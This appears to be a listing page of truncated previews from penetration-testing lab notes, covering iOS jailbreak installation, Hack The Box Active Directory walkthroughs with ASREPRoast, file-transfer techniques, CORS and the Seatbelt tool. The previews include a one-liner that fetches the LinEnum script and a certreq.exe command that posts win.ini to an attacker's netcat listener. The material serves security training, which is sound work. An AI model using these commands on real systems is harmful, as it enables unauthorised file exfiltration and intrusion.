Installing UncOver To install UncOver using Sideloadly, simply download the latest Uncover IPA file from (Unc0ver)[https://unc0ver.dev]. Download and launch Sideloadly on Windows or macOS. Connect...

Host entries 10.10.10.175 egotistical-bank.local If Active Directory => NTP Synchronization with the domain controller. Content RPC Enumeration Web Enumeration valid users ASREPRoast A...

Host entries 10.10.10.161 FOREST.htb.local htb.local If Active Directory => NTP Synchronization with the domain controller. Content RPC Enumeration ASREPRoast attack [X] Kerbrute enumera...

Python Web Server to Upload Files Installing a Configured WebServer with Upload For our web server, we can use uploadserver, an extended module of the Python HTTP.server module, which includes a f...

FTP Downloads A way to transfer files is using FTP (File Transfer Protocol), which use port TCP/21 and TCP/20. We can use the FTP client or PowerShell Net.WebClient to download files from an FTP se...

SMB Uploads We can run SMB over HTTP with WebDav. WebDAV is an extension of HTTP, the WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. W...

Python 2 - Download Shuciran@htb[/htb]$ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' Python 3 - Downloa...

Upload win.ini to our Pwnbox This will send the file to our Netcat session, and we can copy-paste its contents. C:\htb> certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini Fil...

Same-Origin Policy and CORS There are three key concepts to understand CORS: Origins and the Same-Origin Policy (SOP) Cross-Origin Resource Sharing (CORS) Sending Requests Between Origins ...

SEATBELT Seatbelt is a C# project that performs a number of security oriented host-survey “safety checks” relevant from both offensive and defensive security perspectives. You can download from he...